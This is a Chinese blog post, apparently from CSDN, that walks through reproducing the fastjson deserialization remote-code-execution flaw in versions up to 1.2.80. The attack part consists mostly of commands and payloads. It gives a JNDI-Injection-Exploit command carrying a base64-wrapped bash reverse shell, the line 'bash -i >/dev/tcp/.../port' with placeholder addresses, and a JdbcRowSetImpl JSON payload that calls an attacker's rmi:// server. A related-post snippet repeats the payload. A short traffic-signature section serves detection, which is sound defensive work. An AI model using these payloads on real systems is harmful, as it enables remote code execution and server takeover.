复现fastjson反序化漏洞(fastjson≤1.2.80)

已于 2023-07-21 17:54:44 修改
阅读量3k 收藏 7
点赞数 4
分类专栏: 漏洞复现 文章标签: 网络安全
于 2023-07-21 16:46:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TVT111/article/details/131850778
版权

 写在前面,本文利用JNDI-Injection-Exploit工具,若文章有理解错误或表述错误的地方,欢迎大家在评论区指正。

目录

一、介绍fastjson

二、简述fastjson反序化漏洞原理

三、全流程复现fastjson反序化漏洞

 1、利用JNDI-Injection-Exploit开启服务、开启监听

 3、抓包发送payload

 4、成功反弹shell

四、总结

五、流量特征

一、介绍fastjson

Fastjson是一个Java库,可用于将Java对象转换为其JSON表示形式。它还可以用于将JSON字符串转换为等效的Java对象。Fastjson可以与任意Java对象一起使用,包括您没有源代码的现有对象。

二、简述fastjson反序化漏洞原理

parse进行反序化时,在json中如果识别到“@type”,会自动的实例化对应的他值,所以可以构造一个恶意json进行攻击。利用rmi协议,实现JAVA远程方法调用。JNDI-Injection-Exploit工具可以实现恶意类的创建,开启rmi、ldap协议。

三、全流程复现fastjson反序化漏洞

 1、利用JNDI-Injection-Exploit开启服务、开启监听

其中 -C “执行命令”  -A 攻击机ip

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,xxxx}|{base64,-d}|{bash,-i}" -A xxx.xxx.xxx.xxx

 请将上述xxxx内容替换为的下面反弹shell命令的base64编码

bash -i >/dev/tcp/xxx.xxx.xxx.xxx/port 0>&1

使用bash -c {echo,xxxx}|{base64,-d}|{bash,-i}形式可以避免反弹时的一些问题,此处不再赘述,可以自行查找绕过exec反弹shell的相关知识。

这里使用nc进行监听

 

 3、抓包发送payload

原始payload,此payload使用了com.sun.rowset.JdbcRowSetImpl攻击链,还可以使用其他攻击链,此处就以Jdbc攻击链为例。

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://xxx.xxx.xxx.xxx:port/xxxx",
        "autoCommit":true
    }
}

将JNDI-Injection-Exploit工具生成的rmi协议地址复制到上述payload相应位置,注意JDK版本

注意请求细节

 4、成功反弹shell

四、总结

 此攻击利用方式存在于特定依赖存在下影响 fastjson≤1.2.80

漏洞主要是利用json中“@type”键对应的value指定任意反序列化类名

此文章使用JNDI-Injection-Exploit工具,主要作用是提供rmi/ldap协议,恶意Java类并架在http协议中。

五、流量特征

JSON格式的请求

请求体中出现@type
有jdbc利用链或其他利用链的特征
服务端响应500(有可能) 200(可能性低一点)

TVT111
关注
专栏目录
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6402
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
【高危安全通告】fastjson1.2.80反序列化漏洞
qq_43354717的博客
05-25 237
近日Fastjson Develop Team 发现 fastjson 1.2.80及以下存在新的风险,请关注。 1. 风险描述 fastjson已使用黑白名单用于防御反序列化漏洞,经研究该利用在特定条件下可绕过默认autoType关闭限制,攻击远程服务器,风险影响较大。建议fastjson用户尽快采取安全措施保障系统安全。 2. 影响版本 特定依赖存在下影响 1.2.80 3. 升级方案 3.1升级到最新版本1.2.83 https://github.com/alibaba/fastjson/
fastjson <= 1.2.80 反序列化任意代码执行漏洞
qq_18209847的博客
05-24 4485
fastjson <= 1.2.80 反序列化任意代码执行漏洞
Fastjson漏洞分析与复现
最新发布
未完成的歌~的博客
08-26 885
fastjson是阿里巴巴开源的JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久了。
FastJson反序列化漏洞复现
小赵同学的博客
07-29 3980
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2226
Fastjson反序列化漏洞复现
fastjson反序列化漏洞复现
weixin_43225966的博客
04-23 952
fastjson 反序列化漏洞复现
fastjson反序列化漏洞复现
weixin_58954236的博客
09-11 1351
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。​ 关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
03-02
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
Fastjson反序列化漏洞原理与复现_fastjson反序漏洞解决(1)
m0_60575487的博客
04-07 699
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
fastjson1.2.75暂未修补的反序列化漏洞
d3f4ult的博客
12-30 7559
目录前言旧版本漏洞回顾1.2.68的漏网之鱼“系统的白名单”"通行证""绕过" 前言 这几天在一直研究fastjson反序列化漏洞,从1.2.24版本开始一直到1.2.68版本,其漏洞分析及其利用在网上还是很多的,但不知是大佬们有意为之还是怎样,各博客上写的payload大致差不多,但其实在1.2.68的漏洞中,能用的思路不只有AutoCloseable这一个,还有其他方式也有可能导致RCE,我相信大佬们的手中依然有没有放出的payload。 其实1.2.75漏洞(在我看来确实是漏洞,因为确实执行反序列化
Fastjson 1.2.80 及以下版本反序列化漏洞(FastJson 1.2.80) rce
yggcwhat
05-04 1808
Fastjson 1.2.80 及以下版本反序列化漏洞(FastJson 1.2.80) rce
FastJson 漏洞复现
来日可期的博客
09-11 2521
FastJson 1.2.24 反序列化导致任意命令执行漏洞Fastjson 1.2.47 远程命令执行漏洞
Fastjson历史漏洞复现
懂进攻知防守
07-27 1450
fastjson在解析json的过程中,支持使用autoType来实例某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。...
Fastjson漏洞复现
weixin_53747497的博客
03-29 2171
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串, 支持将 Java Bean 序列为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。fastjson在解析json的过程中,支持使用autoType来实例某一个具体的类,并调用该类的set/get方法 来 访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
fastjson漏洞复现
buffedon的博客
08-01 2957
fastjson漏洞复现fastjson漏洞原理简介靶机环境搭建漏洞探测发送一个错的数据包正确的数据包发送漏洞利用docker 搭建靶机编译恶意类启动HTTP服务启动rmi服务发送数据利用fastjson漏洞反弹shell fastjson漏洞原理简介 若lookup函数中的参数攻击者可控,便可以指向攻击者的服务器,即可实现JNDI注入实现任意代码执行。 原理(流程): 攻击者访问目标网站,通过burpsuite抓包,以json的格式添加 JdbcRowSetImpl 恶意类信息,发送给目标机。
漏洞复现Fastjson反序列化
网络安全知识分享
12-31 5911
Fastjson反序列化一、简介二、序列反序列化三、Fastjson漏洞介绍1、漏洞原理2、RMI3、JNDI4、JEP290四、编写的简单测试的环境五、漏洞版本1、fastjson<=1.2.241.1、TemplatesImpl 利用链分析1.2、JNDI利用链分析1.3、JNDI利用1.4、官方进行的修复2、fastjson<=1.2.413、fastjson<=1.2.424、fastjson<=1.2.455、fastjson<=1.2.476、1.2.48&lt
Fastjson <= 1.2.47 反序列化漏洞复现
qq_32660043的博客
08-23 445
0x01 前言 Fastjson 是一个 Java 语言编写的高性能功能完善的 JSON 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,在中国和美国使用较为广泛。 0x02 漏洞成因 Fastjson < 1.2.68 版本在处理反序列化对象时存在安全问题,导致攻击者可以执行 java 代码,具体分析可参考:FastJson 反序列化学习 0x03 环境准备 docker 搜索 Fastjson 漏洞利用镜像: docker search fas
fastjson反序列化漏洞复现vulhub
06-01
好的,这是一个比较常见的漏洞,以下是vulhub上的fastjson反序列化漏洞复现步骤: 1. 下载并启动vulhub: ``` git clone https://github.com/vulhub/vulhub.git cd vulhub/fastjson/1.2.24_rce/ docker-compose up -d ``` 2. 打开浏览器,访问`http://your-ip:8080/`,可以看到一个输入框和一个提交按钮。 3. 在输入框中输入以下内容: ``` {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://your-ip:1099/Exploit","autoCommit":true} ``` 其中,`your-ip`需要替换为你自己的IP地址。 4. 点击提交按钮,可以看到出现了一个弹窗,表示攻击成功。 5. 在vulhub所在的机器上执行以下命令: ``` nc -lvnp 4444 ``` 6. 在攻击成功的弹窗中,点击“确认”按钮,即可成功得到一个反弹shell。 以上就是漏洞复现步骤,需要注意的是,该漏洞具有很大的危害性,攻击者可以通过该漏洞实现远程命令执行,因此需要及时修复。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值